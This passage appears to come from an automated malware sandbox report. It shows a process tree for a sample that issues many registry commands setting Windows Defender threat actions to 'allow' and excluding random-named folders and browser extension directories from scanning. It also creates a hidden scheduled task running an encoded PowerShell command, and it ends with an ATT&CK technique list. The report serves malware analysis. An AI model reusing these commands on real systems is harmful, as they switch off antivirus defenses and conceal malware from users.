Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5704
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6940
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5908
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6556
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6140
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3808
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:244
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5696
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IYgGQCIDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IYgGQCIDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SispZMIUHlKkC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SispZMIUHlKkC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VMcfcqZeQaOU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VMcfcqZeQaOU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WUITINsQgCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WUITINsQgCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eHdwxxvqRpTedTcabtR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eHdwxxvqRpTedTcabtR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\xFlMivLSBvkcEEVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\xFlMivLSBvkcEEVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ynivKcrpvjVAAlvE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ynivKcrpvjVAAlvE\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:4596
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IYgGQCIDU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6228
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IYgGQCIDU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IYgGQCIDU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SispZMIUHlKkC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SispZMIUHlKkC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMcfcqZeQaOU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMcfcqZeQaOU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WUITINsQgCUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WUITINsQgCUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eHdwxxvqRpTedTcabtR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eHdwxxvqRpTedTcabtR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6224
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\xFlMivLSBvkcEEVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\xFlMivLSBvkcEEVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ynivKcrpvjVAAlvE /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ynivKcrpvjVAAlvE /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6628
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gBJRVkaKn" /SC once /ST 00:09:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:6704
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gBJRVkaKn"
  2⤵
  PID:6544

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:2140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6604 -ip 6604
1⤵
PID:3012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Query Registry

Remote System Discovery

T1018

System Information Discovery

Virtualization/Sandbox Evasion